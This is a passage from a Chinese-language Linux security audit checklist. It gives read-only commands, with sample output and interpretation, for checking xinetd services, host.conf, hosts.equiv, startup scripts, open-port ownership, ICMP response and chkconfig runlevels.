查看系统是否运行xinetd/inetd服务
4.4.2 检查方法:
ps -aux | grep inetd ps -aux | grep xinetd
4.4.3 结果分析方法:
# ps -aux | grep xinetd
root 383 0.0 0.6 2088 832 ? S 20:06 0:00 xinetd -stayalive
4.4.4 备注:
本例输出表示系统运行xinetd,
# cd /etc/xinetd.d
# grep “disable” ./*
./chargen: disable = yes
./chargen-udp: disable = yes
./cvs: disable = no
./daytime: disable = yes
./daytime-udp: disable = yes
./echo: disable = yes
./echo-udp: disable = yes
./rsync: disable = yes
./servers: disable = yes
./services: disable = yes
./time: disable = yes
./time-udp: disable = yes
./wu-ftpd: disable = yes
输出中disable=no表示xinetd启动cvs进程,执行netstat -a进行确认。
# netstat -a
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:cvspserver *:* LISTEN
4.5 /etc/hosts.conf信息检查
4.5.1 说明:
得到系统解析地址的信息
4.5.2 检查方法:
/etc/host.conf
4.5.3 结果分析方法:
# cat /etc/host.conf
order hosts,bind
4.5.4 备注:
本例输出表示先通过hosts文件解析,然后通过DNS解析。
4.6 /etc/hosts.equiv信息检查
4.6.1 说明:
查看是否存在/etc/hosts.equiv文件
4.6.2 检查方法:
ls -al /etc/hosts.equiv
4.6.3 结果分析方法:
# ls -al /etc/hosts.equiv
4.7 /etc/rc.d/init.d自动运行脚本检查
4.7.1 说明:
查看系统开机自动运行的脚本
4.7.2 检查方法:
ls -al /etc/rc.d/init.d
4.7.3 结果分析方法:
# ls -al /etc/rc.d/init.d/
total 208
drwxr-xr-x 2 root 4096 Nov 13 14:12 ./
drwxr-xr-x 10 root 4096 May 10 22:12 ../
-rwxr-xr-x 1 root 2633 Aug 23 2002 aep1000*
-rwxr-xr-x 1 root 941 Aug 28 2002 anacron*
-rwxr-xr-x 1 root 1458 Jun 23 2002 apmd*
-rwxr-xr-x 1 root 1176 Jul 25 2002 atd*
-rwxr-xr-x 1 root 9435 Aug 27 2002 autofs*
-rwxr-xr-x 1 root 2455 Aug 23 2002 bcm5820*
-rwxr-xr-x 1 root 1095 Aug 24 2002 cpqarrayd*
-rwxr-xr-x 1 root 1316 Jul 20 2002 crond*
-rwxr-xr-x 1 root 10068 Jul 14 2002 functions*
-rwxr-xr-x 1 root 1541 Jun 24 2002 gpm*
-rwxr-xr-x 1 root 5075 Aug 14 2002 halt*
-rwxr-xr-x 1 root 2366 Sep 5 2002 httpd*
-rwxr-xr-x 1 root 5636 Aug 7 2002 iptables*
-rwxr-xr-x 1 root 1152 Jul 9 2002 irda*
-rwxr-xr-x 1 root 1084 Aug 3 2002 kdcrotate*
-rwxr-xr-x 1 root 1347 Sep 5 2002 keytable*
-rwxr-xr-x 1 root 481 Jul 6 2002 killall*
-rwxr-xr-x 1 root 1919 Sep 3 2002 kudzu*
-rwxr-xr-x 1 root 1539 Aug 24 2002 microcode_ctl*
-rwxr-xr-x 1 root 5024 Jun 26 2002 netfs*
-rwxr-xr-x 1 root 6402 Jul 10 2002 network*
-rwxr-xr-x 1 root 4522 Aug 1 2002 nfs*
-rwxr-xr-x 1 root 2286 Aug 1 2002 nfslock*
-rwxr-xr-x 1 root 2066 Sep 6 2002 nscd*
-r-xr-xr-x 1 root 4596 Aug 31 2002 pcmcia*
-rwxr-xr-x 1 root 1901 Aug 7 2002 portmap*
-rwxr-xr-x 1 root 1516 Jun 26 2002 random*
-rwxr-xr-x 1 root 2211 Jun 26 2002 rawdevices*
-rwxr-xr-x 1 root 1782 Sep 10 2002 rhnsd*
-rwxr-xr-x 1 root 1260 Sep 3 2002 saslauthd*
-r-x------ 1 root 177 Nov 13 14:12 secuve_file*
-rwxr-xr-x 1 root 2362 Aug 30 2002 sendmail*
-rwxr-xr-x 1 root 1175 Jul 10 2002 single*
-rwxr-xr-x 1 root 627 Aug 24 2002 smartd*
-rwxr-xr-x 1 root 1160 Sep 1 2002 snmpd*
-rwxr-xr-x 1 root 1131 Sep 1 2002 snmptrapd*
-rwxr-xr-x 1 root 2647 Aug 14 2002 sshd*
-rwxr-xr-x 1 root 1369 Jun 24 2002 syslog*
-rwxr-xr-x 1 root 2407 Aug 16 2002 xinetd*
-rwxr-xr-x 1 root 2501 Jun 24 2002 ypbind*
4.8 开放端口与进程信息检查
4.8.1 说明:
查看某个开放端口由哪个进程打开
4.8.2 检查方法:
假设要查看的开放端口是2401,执行fuser -n tcp 2401,返回的进程ID为pid,
再执行ps -aux | grep pid。
4.8.3 结果分析方法:
# fuser -n tcp 2401
2401/tcp: 383
# ps -aux | grep 383
root 383 0.0 0.6 2088 832 ? S 20:06 0:00 xinetd -stayalive
4.8.4 备注:
本例输出表示2401端口由xinetd进程打开。
此检查可以检测系统开放的不明端口。
4.9 /etc/rc.d/rc[0-6].d脚本信息检查
4.9.1 说明:
查看/etc/rc.d/rc[0-6].d下运行的脚本
4.9.2 检查方法:
ls -al /etc/rc.d/rc0.d
…
ls -al /etc/rc.d/rc6.d
4.9.3 结果分析方法:
# ls -al rc3.d/
total 8
drwxr-xr-x 2 root 4096 Nov 13 14:21 ./
drwxr-xr-x 10 root 4096 May 10 22:12 ../
lrwxrwxrwx 1 root 28 Nov 13 14:12 BS99file -> /etc/rc.d/init.d/secuve_file*
lrwxrwxrwx 1 root 15 Oct 29 2002 K03rhnsd -> ../init.d/rhnsd*
lrwxrwxrwx 1 root 17 Oct 29 2002 K05anacron -> ../init.d/anacron*
lrwxrwxrwx 1 root 13 Oct 29 2002 K05atd -> ../init.d/atd*
lrwxrwxrwx 1 root 18 Oct 29 2002 K05keytable -> ../init.d/keytable*
lrwxrwxrwx 1 root 19 Oct 29 2002 K05saslauthd -> ../init.d/saslauthd*
lrwxrwxrwx 1 root 13 Oct 29 2002 K15gpm -> ../init.d/gpm*
lrwxrwxrwx 1 root 13 Oct 29 2002 K20nfs -> ../init.d/nfs*
lrwxrwxrwx 1 root 14 Oct 29 2002 K24irda -> ../init.d/irda*
lrwxrwxrwx 1 root 18 Oct 29 2002 K30sendmail -> ../init.d/sendmail*
lrwxrwxrwx 1 root 16 Oct 29 2002 K45smartd -> ../init.d/smartd*
lrwxrwxrwx 1 root 15 Oct 29 2002 K50snmpd -> ../init.d/snmpd*
lrwxrwxrwx 1 root 19 Oct 29 2002 K50snmptrapd -> ../init.d/snmptrapd*
lrwxrwxrwx 1 root 15 Oct 29 2002 K60crond -> ../init.d/crond*
lrwxrwxrwx 1 root 17 Oct 29 2002 K70aep1000 -> ../init.d/aep1000*
lrwxrwxrwx 1 root 17 Oct 29 2002 K70bcm5820 -> ../init.d/bcm5820*
lrwxrwxrwx 1 root 16 Oct 29 2002 K72autofs -> ../init.d/autofs*
lrwxrwxrwx 1 root 14 Oct 29 2002 K74apmd -> ../init.d/apmd*
lrwxrwxrwx 1 root 15 Oct 29 2002 K75netfs -> ../init.d/netfs*
lrwxrwxrwx 1 root 17 Oct 29 2002 K86nfslock -> ../init.d/nfslock*
lrwxrwxrwx 1 root 17 Oct 29 2002 K87portmap -> ../init.d/portmap*
lrwxrwxrwx 1 root 18 Oct 29 2002 K92iptables -> ../init.d/iptables*
lrwxrwxrwx 1 root 15 Oct 29 2002 K95kudzu -> ../init.d/kudzu*
lrwxrwxrwx 1 root 16 Oct 29 2002 K96pcmcia -> ../init.d/pcmcia*
lrwxrwxrwx 1 root 23 Oct 29 2002 S00microcode_ctl -> ../init.d/microcode_ctl*
lrwxrwxrwx 1 root 17 Oct 29 2002 S10network -> ../init.d/network*
lrwxrwxrwx 1 root 16 Oct 29 2002 S12syslog -> ../init.d/syslog*
lrwxrwxrwx 1 root 16 Oct 29 2002 S20random -> ../init.d/random*
lrwxrwxrwx 1 root 14 Oct 29 2002 S55sshd -> ../init.d/sshd*
lrwxrwxrwx 1 root 20 Oct 29 2002 S56rawdevices -> ../init.d/rawdevices*
lrwxrwxrwx 1 root 16 Oct 29 2002 S56xinetd -> ../init.d/xinetd*
lrwxrwxrwx 1 root 15 Oct 29 2002 S85httpd -> ../init.d/httpd*
lrwxrwxrwx 1 root 11 Oct 30 2002 S99local -> ../rc.local*
4.9.4 备注:
以S开头的为该运行级别下运行的脚本
4.10 系统ping响应信息检查
4.10.1 说明:
查看系统是否响应ICMP请求
4.10.2 检查方法:
cat /proc/sys/net/ipv4/icmp_echo_ignore_all
或从同网段的另一台机器ping该主机
4.10.3 结果分析方法:
# cat /proc/sys/net/ipv4/icmp_echo_ignore_all
0
4.10.4 备注:
本例输出表示系统响应ICMP请求
4.11 系统服务运行等级信息检查
4.11.1 说明:
查看系统服务运行等级信息
4.11.2 检查方法:
chkconfig --list
4.11.3 结果分析方法:
# chkconfig --list
syslog 0:off 1:off 2:on 3:on 4:on 5:on 6:off
microcode_ctl 0:off 1:off 2:on 3:on 4:on 5:on 6:off
netfs 0:off 1:off 2:off 3:off 4:on 5:on 6:off
network 0:off 1:off 2:on 3:on 4:on 5:on 6:off
random 0:off 1:off 2:on 3:on 4:on 5:on 6:off
rawdevices 0:off 1:off 2:off 3:on 4:on 5:on 6:off
saslauthd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
xinetd 0:off 1:off 2:off 3:on 4:on 5:on 6:off
portmap 0:off 1:off 2:off 3:off 4:on 5:on 6:off
apmd 0:off 1:off 2:on 3:off 4:on 5:on 6:off
atd 0:off 1:off 2:off 3:off 4:on 5:on 6:off
gpm 0:off 1:off 2:on 3:off 4:on 5:on 6:off
autofs 0:off 1:off 2:off 3:off 4:on 5:on 6:off
irda 0:off 1:off 2:off 3:off 4:off 5:off 6:off
keytable 0:off 1:on 2:on 3:off 4:on 5:on 6:off
kudzu 0:off 1:off 2:off 3:off 4:on 5:on 6:off
sshd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
snmpd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
snmptrapd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
sendmail 0:off 1:off 2:on 3:off 4:on 5:on 6:off
smartd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
iptables 0:off 1:off 2:on 3:off 4:on 5:on 6:off
nfs 0:off 1:off 2:off 3:off 4:off 5:off 6:off
nfslock 0:off 1:off 2:off 3:off 4:on 5:on 6:off
rhnsd 0:off 1:off 2:off 3:off 4:on 5:on 6:off
pcmcia 0:off 1:off 2:on 3:off 4:on 5:on 6:off
crond 0:off 1:off 2:on 3:off 4:on 5:on 6:off
anacron 0:off 1:off 2:on 3:off 4:on 5:on 6:off
aep1000 0:off 1:off 2:off 3:off 4:off 5:off 6:off
bcm5820 0:off 1:off 2:off 3:off 4:off 5:off 6:off
httpd 0:off 1:off 2:off 3:on 4:off 5:off 6:off
xinetd based services:
chargen-udp: off
chargen: off
daytime-udp: off
daytime: off
echo-udp: off
echo: off
services: off
